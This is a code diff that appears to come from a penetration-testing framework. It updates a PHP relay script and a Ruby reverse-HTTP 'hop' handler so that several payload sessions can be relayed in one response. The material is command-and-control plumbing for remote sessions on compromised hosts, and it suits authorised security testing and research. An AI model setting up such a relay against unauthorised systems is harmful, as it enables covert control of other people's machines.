Added bundling to handle many sessions at once.
scriptjunkie
parent
c0983138a0
commit
022c52d087
|
|
@ -10,7 +10,7 @@ $url = $_SERVER["QUERY_STRING"];
|
||||||
//like /path/hop.php?/uRIcksm_lOnGidENTifIEr
|
//like /path/hop.php?/uRIcksm_lOnGidENTifIEr
|
||||||
|
|
||||||
//Looks for a file with a name or contents prefix, if found, send it and deletes it
|
//Looks for a file with a name or contents prefix, if found, send it and deletes it
|
||||||
function findSendDelete($tempdir, $prefix){
|
function findSendDelete($tempdir, $prefix, $one=true){
|
||||||
if($dh = opendir($tempdir)){
|
if($dh = opendir($tempdir)){
|
||||||
while(($file = readdir($dh)) !== false){
|
while(($file = readdir($dh)) !== false){
|
||||||
if(strpos($file, $prefix) !== 0){
|
if(strpos($file, $prefix) !== 0){
|
||||||
|
|
@ -18,7 +18,9 @@ function findSendDelete($tempdir, $prefix){
|
||||||
}
|
}
|
||||||
readfile($tempdir."/".$file);
|
readfile($tempdir."/".$file);
|
||||||
unlink($tempdir."/".$file);
|
unlink($tempdir."/".$file);
|
||||||
break;
|
if($one){
|
||||||
|
break;
|
||||||
|
}
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
@ -37,7 +39,7 @@ if($url === "/control"){
|
||||||
fwrite($f, $postdata);
|
fwrite($f, $postdata);
|
||||||
fclose($f);
|
fclose($f);
|
||||||
}else{
|
}else{
|
||||||
findSendDelete($tempdir, "up_");
|
findSendDelete($tempdir, "up_", false);
|
||||||
}
|
}
|
||||||
}else if($_SERVER['REQUEST_METHOD'] === 'POST'){
|
}else if($_SERVER['REQUEST_METHOD'] === 'POST'){
|
||||||
//get data
|
//get data
|
||||||
|
|
@ -56,6 +58,8 @@ if($url === "/control"){
|
||||||
$urlen = strlen($url);
|
$urlen = strlen($url);
|
||||||
fwrite($f, pack('V', $urlen));
|
fwrite($f, pack('V', $urlen));
|
||||||
fwrite($f, $url);
|
fwrite($f, $url);
|
||||||
|
$postdatalen = strlen($postdata);
|
||||||
|
fwrite($f, pack('V', $postdatalen));
|
||||||
fwrite($f, $postdata);
|
fwrite($f, $postdata);
|
||||||
fclose($f);
|
fclose($f);
|
||||||
//Initial query will be a GET and have a 12345 in it
|
//Initial query will be a GET and have a 12345 in it
|
||||||
|
|
|
||||||
|
|
@ -104,42 +104,44 @@ module ReverseHopHttp
|
||||||
next
|
next
|
||||||
end
|
end
|
||||||
|
|
||||||
# validate response
|
# validate responses, handle each message down
|
||||||
received = res.body
|
received = res.body
|
||||||
next if received.length < 12 || received.slice!(0, MAGIC.length) != MAGIC
|
until received.length < 12 || received.slice!(0, MAGIC.length) != MAGIC
|
||||||
|
|
||||||
# good response
|
# good response
|
||||||
delay = 0 # we're talking, speed up
|
delay = 0 # we're talking, speed up
|
||||||
urlen = received.slice!(0,4).unpack('V')[0]
|
urlen = received.slice!(0,4).unpack('V')[0]
|
||||||
urlpath = received.slice!(0,urlen)
|
urlpath = received.slice!(0,urlen)
|
||||||
|
datalen = received.slice!(0,4).unpack('V')[0]
|
||||||
|
|
||||||
# do not want handlers to change while we dispatch this
|
# do not want handlers to change while we dispatch this
|
||||||
hop_http.lock.lock
|
hop_http.lock.lock
|
||||||
#received is now the binary contents of the message
|
#received now starts with the binary contents of the message
|
||||||
if hop_http.handlers.include? urlpath
|
if hop_http.handlers.include? urlpath
|
||||||
pack = Rex::Proto::Http::Packet.new
|
pack = Rex::Proto::Http::Packet.new
|
||||||
pack.body = received
|
pack.body = received.slice!(0,datalen)
|
||||||
hop_http.current_url = urlpath
|
hop_http.current_url = urlpath
|
||||||
hop_http.handlers[urlpath].call(hop_http, pack)
|
hop_http.handlers[urlpath].call(hop_http, pack)
|
||||||
hop_http.lock.unlock
|
hop_http.lock.unlock
|
||||||
elsif !closed_handlers.include? urlpath
|
elsif !closed_handlers.include? urlpath
|
||||||
hop_http.lock.unlock
|
hop_http.lock.unlock
|
||||||
#New session!
|
#New session!
|
||||||
conn_id = urlpath.gsub("/","")
|
conn_id = urlpath.gsub("/","")
|
||||||
# Short-circuit the payload's handle_connection processing for create_session
|
# Short-circuit the payload's handle_connection processing for create_session
|
||||||
# We are the dispatcher since we need to handle the comms to the hop
|
# We are the dispatcher since we need to handle the comms to the hop
|
||||||
create_session(hop_http, {
|
create_session(hop_http, {
|
||||||
:passive_dispatcher => self,
|
:passive_dispatcher => self,
|
||||||
:conn_id => conn_id,
|
:conn_id => conn_id,
|
||||||
:url => uri.to_s + conn_id + "/\x00",
|
:url => uri.to_s + conn_id + "/\x00",
|
||||||
:expiration => datastore['SessionExpirationTimeout'].to_i,
|
:expiration => datastore['SessionExpirationTimeout'].to_i,
|
||||||
:comm_timeout => datastore['SessionCommunicationTimeout'].to_i,
|
:comm_timeout => datastore['SessionCommunicationTimeout'].to_i,
|
||||||
:ssl => false,
|
:ssl => false,
|
||||||
})
|
})
|
||||||
# send new stage to hop so next inbound session will get a unique ID.
|
# send new stage to hop so next inbound session will get a unique ID.
|
||||||
hop_http.send_new_stage
|
hop_http.send_new_stage
|
||||||
else
|
else
|
||||||
hop_http.lock.unlock
|
hop_http.lock.unlock
|
||||||
|
end
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
hop_http.monitor_thread = nil #make sure we're out
|
hop_http.monitor_thread = nil #make sure we're out
|
||||||
|
|
|
||||||
Loading…
Reference in New Issue